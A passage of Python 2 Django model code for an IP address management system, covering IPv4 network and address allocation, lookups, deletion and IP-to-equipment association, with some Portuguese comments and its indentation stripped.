def allocate_network(self, id_vlan, prefix=None):
"""Allocate new NetworkIPv4
@raise VlanNotFoundError: Vlan is not registered.
@raise VlanError: Failed to search for the Vlan
@raise ConfigEnvironmentInvalidError: Invalid Environment Configuration or not registered
@raise NetworkIPv4Error: Error persisting a NetworkIPv4.
@raise NetworkIPv4AddressNotAvailableError: Unavailable address to create a NetworkIPv4.
@raise Invalid: Unavailable address to create a NetworkIPv4.
@raise InvalidValueError: Network type does not exist.
"""
vlan_model = get_model('vlan', 'Vlan')
self.vlan = vlan_model().get_by_pk(id_vlan)
nets_envs, netv6 = self.vlan.get_networks_related(
has_netv6=False, exclude_current=False)
nets_envs = [IPNetwork(net.networkv4) for net in nets_envs]
network_found = None
try:
configs = self.vlan.ambiente.configs.filter(
ip_config__type=IP_VERSION.IPv4[0])
# For each configuration founded in environment
for config in configs:
net4 = IPNetwork(config.ip_config.subnet)
if prefix is not None:
new_prefix = int(prefix)
else:
new_prefix = int(config.ip_config.new_prefix)
self.log.info(
u'Prefix that will be used: %s' % new_prefix)
subnets = net4.iter_subnets(new_prefix=new_prefix)
for subnet in subnets:
try:
self.vlan.verify_networks(nets_envs, [subnet])
except Exception, e:
pass
continue
else:
# Set octs by network generated
self.oct1, self.oct2, self.oct3, self.oct4 = str(
subnet.network).split('.')
# Set block by network generated
self.block = subnet.prefixlen
self.broadcast = subnet.broadcast.compressed
mask = subnet.netmask.exploded.split('.')
self.mask_oct1 = mask[0]
self.mask_oct2 = mask[1]
self.mask_oct3 = mask[2]
self.mask_oct4 = mask[3]
return
# Checks if found any available network
if network_found is None:
# If not found, an exception is thrown
raise NetworkIPv4AddressNotAvailableError(
None, u'Unavailable address to create a NetworkIPv4.')
except (ValueError, TypeError, AddressValueError), e:
raise ConfigEnvironmentInvalidError(e, u'Invalid Configuration')
class Ip(BaseModel):
id = models.AutoField(
primary_key=True,
db_column='id_ip'
)
oct4 = models.IntegerField()
oct3 = models.IntegerField()
oct2 = models.IntegerField()
oct1 = models.IntegerField()
descricao = models.CharField(
max_length=100,
blank=True
)
networkipv4 = models.ForeignKey(
'ip.NetworkIPv4',
db_column='id_redeipv4'
)
log = logging.getLogger('Ip')
class Meta(BaseModel.Meta):
db_table = u'ips'
managed = True
unique_together = ('oct1', 'oct2', 'oct3', 'oct4', 'networkipv4')
def _get_formated_ip(self):
"""Returns formated ip."""
return '%s.%s.%s.%s' % (self.oct1, self.oct2, self.oct3, self.oct4)
ip_formated = property(_get_formated_ip)
def _get_equipments(self):
"""Returns equipments list."""
ipeqs = self.ipequipamento_set.all().select_related('equipamento')
eqpts = [ipeq.equipamento for ipeq in ipeqs]
return eqpts
equipments = property(_get_equipments)
def _get_vips(self):
"""Returns vips list."""
vips = self.viprequest_set.all()
return vips
vips = property(_get_vips)
def _get_server_pool_members(self):
"""Returns pool members list."""
server_pool_members = self.serverpoolmember_set.all()
return server_pool_members
server_pool_members = property(_get_server_pool_members)
@classmethod
def list_by_network(cls, id_network):
"""Get IP LIST by id_network.
@return: IP List.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ip.objects.filter(networkipv4=id_network)
except ObjectDoesNotExist, e:
raise IpNotFoundError(
e, u'There is no IP with network_id = %s.' % id)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP')
@classmethod
def list_by_environment_and_equipment(cls, id_ambiente, id_equipment):
"""Get IP LIST by id_network.
@return: IP List.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ip.objects.filter(networkipv4__vlan__ambiente__id=id_ambiente, ipequipamento__equipamento__id=id_equipment)
except ObjectDoesNotExist, e:
raise IpNotFoundError(
e, u'There is no IP with network_id = %s.' % id)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP')
@classmethod
def get_by_pk(cls, id):
"""Get IP by id.
@return: IP.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ip.objects.filter(id=id).uniqueResult()
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'There is no IP with pk = %s.' % id)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP')
def delete_ip4(self, user, id_ip):
try:
ip = self.get_by_pk(id_ip)
ip.delete()
except IpNotFoundError, e:
raise IpNotFoundError(None, e)
except Exception, e:
self.log.error(u'Failure to delete the IP.')
raise IpError(e, u'Failure to delete the IP')
@classmethod
def get_available_ip(cls, id_network):
"""Get a available Ipv4 for networkIPv4
@return: Available Ipv4
@raise IpNotAvailableError: NetworkIPv4 does not has available Ipv4
"""
networkipv4 = NetworkIPv4().get_by_pk(id_network)
# Cast to API
net4 = IPv4Network('%d.%d.%d.%d/%d' % (networkipv4.oct1, networkipv4.oct2,
networkipv4.oct3, networkipv4.oct4, networkipv4.block))
# Find all ips ralated to network
ips = Ip.objects.filter(networkipv4__id=networkipv4.id)
# Cast all to API class
ipsv4 = set(
[(IPv4Address('%d.%d.%d.%d' % (ip.oct1, ip.oct2, ip.oct3, ip.oct4))) for ip in ips])
# Get configuration
conf = Configuration.get()
selected_ip = None
# For each ip generated
i = 0
for ip in net4.iterhosts():
# Do not use some range of IPs (config)
i = i + 1
if i >= conf.IPv4_MIN and i < (net4.numhosts - conf.IPv4_MAX):
# If IP generated was not used
if ip not in ipsv4:
# Use it
selected_ip = ip
# Stop generation
return selected_ip
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IP available to NETWORK %s.' % networkipv4.id)
@classmethod
def get_first_available_ip(cls, id_network, topdown=False):
"""Get a first available Ipv4 for networkIPv4
@return: Available Ipv4
@raise IpNotAvailableError: NetworkIPv4 does not has available Ipv4
"""
networkipv4 = NetworkIPv4().get_by_pk(id_network)
# Cast to API
net4 = IPv4Network('%d.%d.%d.%d/%d' % (networkipv4.oct1, networkipv4.oct2,
networkipv4.oct3, networkipv4.oct4, networkipv4.block))
# Find all ips ralated to network
ips = Ip.objects.filter(networkipv4__id=networkipv4.id)
# Cast all to API class
ipsv4 = set(
[(IPv4Address('%d.%d.%d.%d' % (ip.oct1, ip.oct2, ip.oct3, ip.oct4))) for ip in ips])
selected_ip = None
if topdown:
method = net4.iterhostsTopDown
else:
method = net4.iterhosts
# For each ip generated
for ip in method():
# If IP generated was not used
if ip not in ipsv4:
# Use it
selected_ip = ip
# Stop generation
return selected_ip
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IP available to NETWORK %s.' % networkipv4.id)
@classmethod
def get_last_available_ip(cls, id_network):
"""Get an available Ipv4 for networkIPv4 from end of range
@return: Available Ipv4
@raise IpNotAvailableError: NetworkIPv4 does not has available Ipv4
"""
networkipv4 = NetworkIPv4().get_by_pk(id_network)
# Cast to API
net4 = IPv4Network('%d.%d.%d.%d/%d' % (networkipv4.oct1, networkipv4.oct2,
networkipv4.oct3, networkipv4.oct4, networkipv4.block))
# Find all ips ralated to network
ips = Ip.objects.filter(networkipv4__id=networkipv4.id)
# Cast all to API class
ipsv4 = set(
[(IPv4Address('%d.%d.%d.%d' % (ip.oct1, ip.oct2, ip.oct3, ip.oct4))) for ip in ips])
selected_ip = None
# For each ip generated
for ip in net4.iterhosts():
# If IP generated was not used
if ip not in ipsv4:
# Use it
selected_ip = ip
# Stop generation
return selected_ip
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IP available to NETWORK %s.' % networkipv4.id)
def edit_ipv4(self, user):
try:
# Cast to API
net4 = IPv4Network('%d.%d.%d.%d/%d' % (self.networkipv4.oct1, self.networkipv4.oct2,
self.networkipv4.oct3, self.networkipv4.oct4, self.networkipv4.block))
# Find all ips ralated to network
ips = Ip.objects.filter(networkipv4__id=self.networkipv4.id)
ip4_object = IPv4Address(
'%s.%s.%s.%s' % (self.oct1, self.oct2, self.oct3, self.oct4))
# Cast all to API class
ipsv4 = set(
[IPv4Address('%d.%d.%d.%d' % (ip.oct1, ip.oct2, ip.oct3, ip.oct4)) for ip in ips])
flag = True
if ip4_object not in ipsv4:
flag = False
if ip4_object in net4:
# Get configuration
# conf = Configuration.get()
first_ip_network = int(net4.network)
bcast_ip_network = int(net4.broadcast)
ipv4_network = int(ip4_object)
if ipv4_network >= (first_ip_network) and ipv4_network < (bcast_ip_network):
flag = True
else:
ip4_aux = self.get_by_octs_and_net(
self.oct1, self.oct2, self.oct3, self.oct4, self.networkipv4.id)
if self.id != ip4_aux.id:
raise IpNotAvailableError(None, u'Ip %s.%s.%s.%s already on use by network %s.' % (
self.oct1, self.oct2, self.oct3, self.oct4, self.networkipv4.id))
if flag:
self.save()
else:
raise IpNotAvailableError(None, u'Ip %s.%s.%s.%s not available for network %s.' % (
self.oct1, self.oct2, self.oct3, self.oct4, self.networkipv4.id))
except IpEquipmentAlreadyAssociation, e:
self.log.error(e)
raise IpEquipmentAlreadyAssociation(None, e)
except AddressValueError:
raise InvalidValueError(
None, 'ip', u'%s.%s.%s.%s' % (self.oct1, self.oct2, self.oct3, self.oct4))
except IpNotAvailableError, e:
raise IpNotAvailableError(None, u'Ip %s.%s.%s.%s not available for network %s.' % (
self.oct1, self.oct2, self.oct3, self.oct4, self.networkipv4.id))
except IpError, e:
self.log.error(
u'Error adding new IP or relationship ip-equipment.')
raise IpError(
e, u'Error adding new IP or relationship ip-equipment.')
def save_ipv4(self, equipment_id, user, net):
try:
already_ip = False
# Cast to API
net4 = IPv4Network(
'%d.%d.%d.%d/%d' % (net.oct1, net.oct2, net.oct3, net.oct4, net.block))
# Find all ips ralated to network
ips = Ip.objects.filter(networkipv4__id=net.id)
ip4_object = IPv4Address(
'%s.%s.%s.%s' % (self.oct1, self.oct2, self.oct3, self.oct4))
# Cast all to API class
ipsv4 = set(
[IPv4Address('%d.%d.%d.%d' % (ip.oct1, ip.oct2, ip.oct3, ip.oct4)) for ip in ips])
flag = False
if ip4_object not in ipsv4:
if ip4_object in net4:
# Get configuration
# conf = Configuration.get()
first_ip_network = int(net4.network)
bcast_ip_network = int(net4.broadcast)
ipv4_network = int(ip4_object)
if ipv4_network >= (first_ip_network) and ipv4_network < (bcast_ip_network):
flag = True
else:
ip_aux = self.get_by_octs_and_net(
self.oct1, self.oct2, self.oct3, self.oct4, net.id)
try:
IpEquipamento.get_by_ip(ip_aux.id)
raise IpEquipmentAlreadyAssociation(None, u'Ip %s.%s.%s.%s already has association with an Equipament. Try using the association screen for this Ip.' % (
self.oct1, self.oct2, self.oct3, self.oct4))
except IpEquipmentNotFoundError, e:
flag = True
already_ip = True
if flag:
equipment = Equipamento().get_by_pk(equipment_id)
ip_equipment = IpEquipamento()
if not already_ip:
self.networkipv4_id = net.id
self.save()
ip_equipment.ip = self
else:
ip_equipment.ip = ip_aux
if self.descricao is not None and len(self.descricao) > 0:
ip_aux.descricao = self.descricao
ip_aux.save()
ip_equipment.equipamento = equipment
# # Filter case 2 - Adding new IpEquip for a equip that already have ip in other network with the same range ##
# Get all IpEquipamento related to this equipment
ip_equips = IpEquipamento.objects.filter(
equipamento=equipment_id)
for ip_test in [ip_equip.ip for ip_equip in ip_equips]:
if ip_test.networkipv4.oct1 == self.networkipv4.oct1 and \
ip_test.networkipv4.oct2 == self.networkipv4.oct2 and \
ip_test.networkipv4.oct3 == self.networkipv4.oct3 and \
ip_test.networkipv4.oct4 == self.networkipv4.oct4 and \
ip_test.networkipv4.block == self.networkipv4.block and \
ip_test.networkipv4 != self.networkipv4:
# Filter testing
if ip_test.networkipv4.vlan.ambiente.filter is None or self.networkipv4.vlan.ambiente.filter is None:
raise IpRangeAlreadyAssociation(
None, u'Equipment is already associated with another ip with the same ip range.')
else:
# Test both environment's filters
tp_equip_list_one = list()
for fet in FilterEquipType.objects.filter(filter=self.networkipv4.vlan.ambiente.filter.id):
tp_equip_list_one.append(fet.equiptype)
tp_equip_list_two = list()
for fet in FilterEquipType.objects.filter(filter=ip_test.networkipv4.vlan.ambiente.filter.id):
tp_equip_list_two.append(fet.equiptype)
if equipment.tipo_equipamento not in tp_equip_list_one or equipment.tipo_equipamento not in tp_equip_list_two:
raise IpRangeAlreadyAssociation(
None, u'Equipment is already associated with another ip with the same ip range.')
# # Filter case 2 - end ##
ip_equipment.save()
# Makes Environment Equipment association
try:
equipment_environment = EquipamentoAmbiente()
equipment_environment.equipamento = equipment
equipment_environment.ambiente = net.vlan.ambiente
equipment_environment.create(user)
except EquipamentoAmbienteDuplicatedError, e:
# If already exists, OK !
pass
else:
raise IpNotAvailableError(None, u'Ip %s.%s.%s.%s not available for network %s.' % (
self.oct1, self.oct2, self.oct3, self.oct4, net.id))
except IpRangeAlreadyAssociation, e:
raise IpRangeAlreadyAssociation(None, e.message)
except IpEquipmentAlreadyAssociation, e:
raise IpEquipmentAlreadyAssociation(None, e.message)
except AddressValueError:
raise InvalidValueError(
None, 'ip', u'%s.%s.%s.%s' % (self.oct1, self.oct2, self.oct3, self.oct4))
except IpNotAvailableError, e:
raise IpNotAvailableError(None, u'Ip %s.%s.%s.%s not available for network %s.' % (
self.oct1, self.oct2, self.oct3, self.oct4, net.id))
except (IpError, EquipamentoError), e:
self.log.error(
u'Error adding new IP or relationship ip-equipment.')
raise IpError(
e, u'Error adding new IP or relationship ip-equipment.')
def create(self, authenticated_user, equipment_id, id, new):
"""Persist an IPv4 and associate it to an equipment.
If equipment was not related with VLAN environment, this makes the relationship
@return: Nothing
@raise NetworkIPv6NotFoundError: NetworkIPv6 does not exist.
@raise NetworkIPv6Error: Error finding NetworkIPv6.
@raise EquipamentoNotFoundError: Equipment does not exist.
@raise EquipamentoError: Error finding Equipment.
@raise IpNotAvailableError: No IP available to VLAN.
@raise IpError: Error persisting in database.
"""
if new is False:
# Search vlan by id
vlan = Vlan().get_by_pk(id)
# Get first networkipv4 related to vlan
try:
self.networkipv4 = vlan.networkipv4_set.order_by('id')[0]
except IndexError, e:
self.log.error(
u'Error finding the first networkipv4 from vlan.')
raise NetworkIPv4NotFoundError(
e, u'Error finding the first networkipv4 from vlan.')
else:
self.networkipv4 = NetworkIPv4().get_by_pk(id)
# Cast to API
net4 = IPv4Network('%d.%d.%d.%d/%d' % (self.networkipv4.oct1, self.networkipv4.oct2,
self.networkipv4.oct3, self.networkipv4.oct4, self.networkipv4.block))
# Find all ips ralated to network
ips = Ip.objects.filter(networkipv4__id=self.networkipv4.id)
# Cast all to API class
ipsv4 = set(
[(IPv4Address('%d.%d.%d.%d' % (ip.oct1, ip.oct2, ip.oct3, ip.oct4))) for ip in ips])
# Get configuration
conf = Configuration.get()
selected_ip = None
# For each ip generated
i = 0
for ip in net4.iterhosts():
# Do not use some range of IPs (config)
i = i + 1
if i >= conf.IPv4_MIN and i < (net4.numhosts - conf.IPv4_MAX):
# If IP generated was not used
if ip not in ipsv4:
# Use it
selected_ip = ip
# Stop generation
break
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IP available to VLAN %s.' % self.networkipv4.vlan.num_vlan)
self.oct1, self.oct2, self.oct3, self.oct4 = str(
selected_ip).split('.')
equipment = Equipamento().get_by_pk(equipment_id)
try:
self.save()
ip_equipment = IpEquipamento()
ip_equipment.ip = self
ip_equipment.equipamento = equipment
ip_equipment.save(authenticated_user)
try:
equipment_environment = EquipamentoAmbiente().get_by_equipment_environment(equipment_id,
self.networkipv4.vlan.ambiente_id)
except EquipamentoAmbienteNotFoundError:
equipment_environment = EquipamentoAmbiente()
equipment_environment.equipamento = equipment
equipment_environment.ambiente = self.networkipv4.vlan.ambiente
equipment_environment.save(authenticated_user)
except Exception, e:
self.log.error(
u'Error adding new IP or relationship ip-equipment.')
raise IpError(
e, u'Error adding new IP or relationship ip-equipment.')
def get_by_octs_equipment(self, oct1, oct2, oct3, oct4, equip_id):
"""Get IP by octs and equip_id.
@return: IP.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return Ip.objects.get(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4, ipequipamento__equipamento__id=equip_id)
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'There is no IP %s.%s.%s.%s of the equipament %s.' % (
oct1, oct2, oct3, oct4, equip_id))
except Exception, e:
self.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
@classmethod
def get_by_octs_and_net(cls, oct1, oct2, oct3, oct4, id_network):
"""Get IP by octs and net.
@return: IP.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return Ip.objects.get(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4, networkipv4=id_network)
except ObjectDoesNotExist, e:
raise IpNotFoundError(
e, u'There is no IP = %s.%s.%s.%s.' % (oct1, oct2, oct3, oct4))
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
@classmethod
def get_by_octs_and_environment_vip(cls, oct1, oct2, oct3, oct4, id_evip, valid=True):
"""Get IP by octs and environment vip.
@return: IP.
@raise IpNotFoundByEquipAndVipError: IP is not related with equipament.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
ips = Ip.objects.filter(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4)
if ips.count() == 0:
raise IpNotFoundError(None)
if valid is True:
return Ip.objects.get(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4,
networkipv4__ambient_vip__id=id_evip)
else:
for ip in ips:
if ip.networkipv4.ambient_vip:
if ip.networkipv4.ambient_vip.id == id_evip:
return ip
else:
environments = Ambiente.objects.filter(
vlan__networkipv4__ambient_vip__id=id_evip)
for env in environments:
if ip.networkipv4.vlan.ambiente.divisao_dc.id == env.divisao_dc.id \
and ip.networkipv4.vlan.ambiente.ambiente_logico.id == env.ambiente_logico.id:
return ip
raise ObjectDoesNotExist()
except ObjectDoesNotExist, e:
evip = EnvironmentVip.get_by_pk(id_evip)
msg = u'Ipv4 não está relacionado ao Ambiente Vip: %s.' % evip.show_environment_vip()
cls.log.error(msg)
raise IpNotFoundByEquipAndVipError(e, msg)
except IpNotFoundError, e:
msg = u'Ipv4 "%s.%s.%s.%s" não exite.' % (oct1, oct2, oct3, oct4)
cls.log.error(msg)
raise IpNotFoundError(e, msg)
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
@classmethod
def get_by_octs_and_environment(cls, oct1, oct2, oct3, oct4, id_environment):
"""Get IP by octs and environment.
@return: IP.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return Ip.objects.get(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4, networkipv4__vlan__ambiente__id=id_environment)
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'There is no IP %s.%s.%s.%s of the environment %s.' % (
oct1, oct2, oct3, oct4, id_environment))
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
# @classmethod
# def valid_real_server(cls, oct1, oct2, oct3, oct4, id_evip, real_name):
# """Validation
# @param name_equip:
# @param ip_real:
# @param id_evip:
# @return: On success: vip_map, vip, None
# In case of error: vip_map, vip, code (code error message).
# @todo: arrruma tudo
# """
# try:
# return Ip.objects.get(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4, networkipv4__ambient_vip__id=id_evip, ipequipamento__equipamento__nome=real_name)
# except ObjectDoesNotExist, e:
# raise IpNotFoundError(e, u'')
# except Exception, e:
# cls.log.error(u'')
# raise IpError(e, u'')
@classmethod
def get_by_octs(cls, oct1, oct2, oct3, oct4):
"""Get IP by octs.
@return: IP.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
ips = Ip.objects.filter(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4)
if len(ips) == 0:
raise ObjectDoesNotExist()
return ips
except ObjectDoesNotExist, e:
raise IpNotFoundError(
e, u'There is no IP = %s.%s.%s.%s.' % (oct1, oct2, oct3, oct4))
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
def delete(self):
"""Sobrescreve o método do Django para remover um IP.
Antes de remover o IP remove todas as suas requisições de VIP e os relacionamentos com equipamentos.
"""
try:
for r in self.requisicaovips_set.all():
r_alter = False
# Assures VIP request is not being changed - issue #48
with distributedlock(LOCK_VIP % r.id):
# updates query after lock for object
r = self.requisicaovips_set.get(id=r.id)
id_vip = r.id
if r.vip_criado:
raise IpCantBeRemovedFromVip(
r.id, 'Ipv4 não pode ser removido, porque está em uso por Requisição Vip %s' % (r.id))
else:
if r.ipv6 is not None:
r.ip = None
r.validado = 0
r.save()
r_alter = True
# SYNC_VIP
syncs.old_to_new(r)
if not r_alter:
r.delete()
# SYNC_VIP
syncs.delete_new(id_vip)
for ie in self.ipequipamento_set.all():
# Codigo removido, pois não devemos remover o ambiente do equipamento mesmo que não tenha IP
# para o ambiente solicidado pelo Henrique
# ambienteequip = EquipamentoAmbiente()
# ambienteequip = ambienteequip.get_by_equipment_environment(
# ie.equipamento.id, self.networkipv4.vlan.ambiente_id)
#
# ips = Ip.list_by_environment_and_equipment(
# ambienteequip.ambiente_id, ie.equipamento.id)
# ips6 = Ipv6.list_by_environment_and_equipment(
# ambienteequip.ambiente_id, ie.equipamento.id)
#
# if len(ips) <= 1 and len(ips6) <= 0:
#
# ambienteequip.delete()
ie.delete()
ip_slz = get_app('api_ip', module_label='serializers')
serializer = ip_slz.Ipv4V3Serializer(self)
data_to_queue = serializer.data
# Deletes Obj IP
super(Ip, self).delete()
# Sends to Queue
queue_manager = QueueManager()
data_to_queue.update({'description': queue_keys.IPv4_REMOVE})
queue_manager.append({
'action': queue_keys.IPv4_REMOVE,
'kind': queue_keys.IPv4_KEY,
'data': data_to_queue
})
except EquipamentoAmbienteNotFoundError, e:
raise EquipamentoAmbienteNotFoundError(None, e.message)
except IpCantBeRemovedFromVip, e:
raise IpCantBeRemovedFromVip(e.cause, e.message)
except IpEquipmentNotFoundError, e:
raise IpEquipmentNotFoundError(None, e.message)
def delete_v3(self):
"""
Method V3 to remove Ip.
Before removing the IP removes all your requests
VIP and relationships with equipment.
@raise IpCantBeRemovedFromVip: Ip is associated with created
Vip Request.
"""
try:
for vip in self.viprequest_set.all():
id_vip = vip.id
with distributedlock(LOCK_VIP % id_vip):
if vip.created:
raise IpCantBeRemovedFromVip(
id_vip,
'IPv4 can not be removed because it is '
'in use by Vip Request %s' % (id_vip))
# Deletes only VIP, Related Ipv6 with VIP is not removed
vip.delete_v3(bypass_ipv4=True, bypass_ipv6=True)
# Deletes Related Equipment
for ip_eqpt in self.ipequipamento_set.all():
ip_eqpt.delete_v3()
# Serializes obj
ip_slz = get_app('api_ip', module_label='serializers')
serializer = ip_slz.Ipv4V3Serializer(self)
data_to_queue = serializer.data
# Deletes Obj IP
super(Ip, self).delete()
# Sends to Queue
queue_manager = QueueManager()
data_to_queue.update({'description': queue_keys.IPv4_REMOVE})
queue_manager.append({
'action': queue_keys.IPv4_REMOVE,
'kind': queue_keys.IPv4_KEY,
'data': data_to_queue
})
queue_manager.send()
except IpCantBeRemovedFromVip, e:
raise IpCantBeRemovedFromVip(e.cause, e.message)
# def create_v3(self, authenticated_user, equipment_id, id, new):
# """Persist an IPv4 and associate it to an equipment.
# If equipment was not related with VLAN environment, this makes the relationship
# @return: Nothing
# @raise NetworkIPv6NotFoundError: NetworkIPv6 does not exist.
# @raise NetworkIPv6Error: Error finding NetworkIPv6.
# @raise EquipamentoNotFoundError: Equipment does not exist.
# @raise EquipamentoError: Error finding Equipment.
# @raise IpNotAvailableError: No IP available to VLAN.
# @raise IpError: Error persisting in database.
# """
# if new is False:
# # Search vlan by id
# vlan = Vlan().get_by_pk(id)
# # Get first networkipv4 related to vlan
# try:
# self.networkipv4 = vlan.networkipv4_set.order_by('id')[0]
# except IndexError, e:
# self.log.error(
# u'Error finding the first networkipv4 from vlan.')
# raise NetworkIPv4NotFoundError(
# e, u'Error finding the first networkipv4 from vlan.')
# else:
# self.networkipv4 = NetworkIPv4().get_by_pk(id)
# # Cast to API
# net4 = IPNetwork(self.networkipv4.networkv4)
# # Find all ips ralated to network
# ips = networkipv4.ip_set.all()
# # Cast all to API class
# ipsv4 = set([(IPv4Address(ip.ip_formated) for ip in ips])
# # Get configuration
# conf=Configuration.get()
# selected_ip=None
# # For each ip generated
# i=0
# for ip in net4.iterhosts():
# # Do not use some range of IPs (config)
# # IPv4_MIN = Firsts
# # IPv4_MAX = Number minimum of Ip reserveds
# # First IP and 2 last I
# i=i + 1
# if i >= conf.IPv4_MIN and i < (net4.numhosts - conf.IPv4_MAX):
# # If IP generated was not used
# if ip not in ipsv4:
# # Use it
# selected_ip=ip
# # Stop generation
# break
# if selected_ip is None:
# raise IpNotAvailableError(
# None, u'No IP available to VLAN %s.' % self.networkipv4.vlan.num_vlan)
# self.oct1, self.oct2, self.oct3, self.oct4=str(
# selected_ip).split('.')
# equipment=Equipamento().get_by_pk(equipment_id)
# try:
# self.save()
# ip_equipment=IpEquipamento()
# ip_equipment.ip=self
# ip_equipment.equipamento=equipment
# ip_equipment.save(authenticated_user)
# try:
# equipment_environment=EquipamentoAmbiente().get_by_equipment_environment(equipment_id,
# self.networkipv4.vlan.ambiente_id)
# except EquipamentoAmbienteNotFoundError:
# equipment_environment=EquipamentoAmbiente()
# equipment_environment.equipamento=equipment
# equipment_environment.ambiente=self.networkipv4.vlan.ambiente
# equipment_environment.save(authenticated_user)
# except Exception, e:
# self.log.error(
# u'Error adding new IP or relationship ip-equipment.')
# raise IpError(
# e, u'Error adding new IP or relationship ip-equipment.')
class IpEquipamento(BaseModel):
id = models.AutoField(
primary_key=True,
db_column='id_ips_dos_equipamentos'
)
ip = models.ForeignKey(
'ip.Ip',
db_column='id_ip'
)
equipamento = models.ForeignKey(
'equipamento.Equipamento',
db_column='id_equip'
)
log = logging.getLogger('IpEquipamento')
class Meta(BaseModel.Meta):
db_table = u'ips_dos_equipamentos'
managed = True
unique_together = ('ip', 'equipamento')
@classmethod
def get_by_ip(cls, ip_id):
"""Get IP by id_ip
@return: IP.
@raise IpEquipmentNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return IpEquipamento.objects.filter(ip__id=ip_id).uniqueResult()
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'There is no IP-Equipament by IP = %s.')
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipament.')
raise IpError(e, u'Failure to search the Ip-Equipament.')
@classmethod
def list_by_ip(cls, ip_id):
"""Get IP by id_ip
@return: IP.
@raise IpEquipmentNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return IpEquipamento.objects.filter(ip__id=ip_id)
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'There is no IP-Equipament by IP = %s.')
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipament.')
raise IpError(e, u'Failure to search the Ip-Equipament.')
@classmethod
def list_by_equip(cls, equip_id):
"""Get IP by id_ip
@return: IPEquipment.
@raise IpEquipmentNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return IpEquipamento.objects.filter(equipamento__id=equip_id)
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'There is no IP-Equipament by Equip = %s.')
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipament.')
raise IpError(e, u'Failure to search the Ip-Equipament.')
@classmethod
def get_by_ip_equipment(cls, ip_id, equip_id):
"""Get IP by id and equip_id.
@return: IP.
@raise IpEquipmentNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return IpEquipamento.objects.get(ip__id=ip_id, equipamento__id=equip_id)
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'There is no IP-Equipament by IP = %s. and Equipament = %s.' % (ip_id, equip_id))
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipament.')
raise IpError(e, u'Failure to search the Ip-Equipament.')
def __validate_ip(self):
try:
IpEquipamento.objects.get(ip=self.ip, equipamento=self.equipamento)
raise IpEquipamentoDuplicatedError(
None, u'IP já cadastrado para o equipamento.')
except ObjectDoesNotExist:
pass
def create(self, authenticated_user, ip_id, equipment_id):
"""Insere um relacionamento entre IP e Equipamento.
@return: Nothing.
@raise IpError: Falha ao inserir.
@raise EquipamentoNotFoundError: Equipamento não cadastrado.
@raise IpNotFoundError: Ip não cadastrado.
@raise IpEquipamentoDuplicatedError: IP já cadastrado para o equipamento.
@raise EquipamentoError: Falha ao pesquisar o equipamento.
"""
self.equipamento = Equipamento().get_by_pk(equipment_id)
self.ip = Ip().get_by_pk(ip_id)
# Valida o ip
self.__validate_ip()
try:
if self.equipamento not in [ea.equipamento for ea in self.ip.networkipv4.vlan.ambiente.equipamentoambiente_set.all().select_related('equipamento')]:
ea = EquipamentoAmbiente(
ambiente=self.ip.networkipv4.vlan.ambiente, equipamento=self.equipamento)
ea.save(authenticated_user)
self.save()
except Exception, e:
self.log.error(u'Falha ao inserir um ip_equipamento.')
raise IpError(e, u'Falha ao inserir um ip_equipamento.')
def delete(self):
"""Override Django's method to remove Ip and Equipment relationship.
